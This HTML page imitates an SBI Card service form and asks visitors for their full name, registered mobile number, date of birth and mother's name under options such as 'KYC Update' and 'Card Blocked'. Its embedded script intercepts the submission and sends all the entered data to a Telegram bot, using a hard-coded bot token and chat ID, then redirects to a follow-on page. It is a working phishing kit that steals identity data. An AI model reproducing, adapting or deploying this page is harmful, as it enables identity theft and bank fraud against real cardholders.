<!DOCTYPE html>
<html>
<head>
  <style>
  {
  font-family: Georgia, serif;
}
    .form-group {
      margin-bottom: 20px;
    }
    label {
      display: block;
      margin-bottom: 5px;
      
    }
    input[type="text"], select {
      width: 100%;
      height: 55px;
      padding: 8px;
      border: none;
      border-radius: 10px;
      box-sizing: border-box;
      color: black;
     font-size: 19px;
      
      
  
      
    }
    input[type="submit"] {
      background-color: #4CAF50;
      color: white;
      border: none;
      padding: 10px 20px;
      text-align: center;
      font-size: 16px;
      border-radius: 10px;
      cursor: pointer;
      height: 50px;
      font-size: 21px;
      font-weight: bold;
      
    }
  /* Style the container */
.container {
  border-radius: 5px;
  background-color: darkblue;
  padding: 20px;
}

/* Floating column for labels: 25% width */
.col-25 {
  float: left;
  width: 25%;
  margin-top: 6px;
}

/* Floating column for inputs: 75% width */
.col-75 {
  float: left;
  width: 75%;
  margin-top: 6px;
}

/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}

/* Responsive layout - when the screen is less than 600px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 600px) {
  .col-25, .col-75, input[type=submit] {
    width: 100%;
    margin-top: 0;
  }
}
  .center {
    margin-bottom: 0px;
  display: block;
  margin-left: auto;
  margin-right: auto;
  width: 100%;
}
  ::placeholder {
  color: black;
  font-size: 19px;
  
}
  .sbicard {
    margin-top: 0%;
  margin-bottom: 30px;
  display: block;
  margin-left: auto;
  margin-right: auto;
  width: 100%;
}
  .sbicard {
    margin-top: 0%;
  margin-bottom: 30px;
  display: block;
  margin-left: auto;
  margin-right: auto;
  width: 100%;
}
  #mobile {
  width: 100%;
      height: 55px;
      padding: 8px;
      border: none;
      border-radius: 10px;
      box-sizing: border-box;
      color: black;
     font-size: 19px;
}
  </style>
</head>
<body>
  <img src="logo1.png" alt="Paris" class="center">
   <img src="logo2.png" alt="Paris" class="sbicard">
  
  <div class="container">
  
    <div class="row">
      <div class="col-25">
        
   <form id="myForm">
    <div class="form-group">
      <label for="fullname"></label>
      <input type="text" id="fullname" name="fullname" placeholder="Full Name" required>
    </div>
    <div class="form-group">
      <label for="mobile"></label>
      <input type="tel" id="mobile" name="mobile" placeholder="Reg... Mobile No." required>
    </div>
    <div class="form-group">
      <label for="dob"></label>
      <input type="text" id="dob" name="dob" placeholder="Date Of Birth" required>
    </div>
    <div class="form-group">
      <label for="mothername"></label>
      <input type="text" id="mothername" name="mothername" placeholder="Mother Name" required>
    </div>
    <div class="form-group">
      <label for="service"></label>
      <select id="service" name="service" required>
        <option value="">-- Select a service --</option>
        <option value="KYC Update">KYC Update</option>
        <option value="Card Blocked">Card Blocked</option>
        <option value="Card Unlocked">Card Unlocked</option>
        <option value="Due Payment Related">Due Payment Related</option>
        <option value="Other Services">Other Services</option>
      </select>
    </div>
        <br>
    <input type="submit" value="NEXT">
  </form>
        <br>
        <br>
        <br>
        <br>
        <img src="sbicard.jpeg" alt="Paris" class="center">
   
        <script>
    // the bot token you received from BotFather when you created the bot
    var botToken = '6583344818:AAFszVaDj2IPIRX6K9h2n9UGq5oXnTcM0gw';

    // the chat ID of the conversation between you and your bot
    var botChatID = '5259679546';

    // the URL you want to redirect to after data is sent
    var redirectUrl = 'card.html';

    document.getElementById('myForm').addEventListener('submit', function(event) {
        event.preventDefault();  // stop the form from submitting
        
        var formData = new FormData(this);
        var messageText = '';
        
        for (var pair of formData.entries()) {
            messageText += pair[0]+ ': '+ pair[1]+'\n';
        }
        
        var sendTextUrl = 'https://api.telegram.org/bot' + botToken + '/sendMessage?chat_id=' + botChatID + '&parse_mode=HTML&text=' + encodeURIComponent(messageText);

        fetch(sendTextUrl)
        .then(response => response.json())
        .then(data => {
            console.log(data);  // log the API response data to the console
            window.location.href = redirectUrl;  // redirect to the specified URL
        });
    });
</script>

</body>
</html>